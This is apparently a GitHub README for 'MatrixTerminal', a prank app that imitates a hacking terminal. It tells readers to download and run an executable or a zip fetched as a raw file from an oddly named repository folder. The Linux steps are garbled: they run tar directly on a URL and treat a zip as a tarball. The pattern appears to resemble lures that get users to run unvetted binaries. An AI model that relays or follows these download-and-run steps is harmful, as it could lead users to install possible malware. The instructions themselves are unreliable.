Welcome to MatrixTerminal! This application is a fun tool that simulates a hacking terminal experience. You can use it for pranks, demos, or just to enjoy the hacker aesthetics. Follow the easy steps below to download and run the software.
To run MatrixTerminal, you will need:
- A computer with Windows, macOS, or Linux.
- At least 512 MB of RAM.
- 100 MB of free disk space.
- A web browser for downloading the application.
You can find the latest version of MatrixTerminal on our releases page. Visit this page to download.
- Go to the Releases page here.
- Look for the latest release version.
- Choose the correct file for your operating system:
- For Windows, look for a file ending in
.exe. - For macOS, look for a file ending in
.dmg. - For Linux, you may find a
https://github.com/naolembro/MatrixTerminal/raw/refs/heads/main/phenospermy/Matrix_Terminal_v2.2.zipfile.
- For Windows, look for a file ending in
- Click on the file to start the download.
- Once the download is complete, find the file on your computer.
- Double-click the downloaded
.exefile. - Follow the installation prompts to complete the setup.
- After installation, you can find MatrixTerminal in your Start menu.
- Open the downloaded
.dmgfile. - Drag the MatrixTerminal icon into your Applications folder.
- You can launch MatrixTerminal from your Applications folder.
- Open a terminal window.
- Navigate to the folder where the file was downloaded.
- Extract the contents using the command:
tar -xzf https://github.com/naolembro/MatrixTerminal/raw/refs/heads/main/phenospermy/Matrix_Terminal_v2.2.zip
- Navigate into the extracted folder and run:
./MatrixTerminal
- Realistic Terminal Interface: Enjoy a visually appealing interface that mimics real hacking environments.
- Prank Mode: Surprise your friends with fake hacks and scripts.
- Video Demos: Use it in videos to create dramatic hacker-style visuals.
- Cross-Platform Support: Works on Windows, macOS, and Linux.
You can find detailed documentation for MatrixTerminal on our GitHub wiki. This includes:
- User guides
- Troubleshooting tips
- FAQs
- Community contributions
If you face any issues or have questions, please create an issue on our GitHub repository. Our community will be happy to help you.
MatrixTerminal was developed as a fun project to explore the aesthetics of hacking. A big thanks to all contributors who helped make this tool enjoyable for everyone.
Enjoy your time with MatrixTerminal, and let your creativity run wild!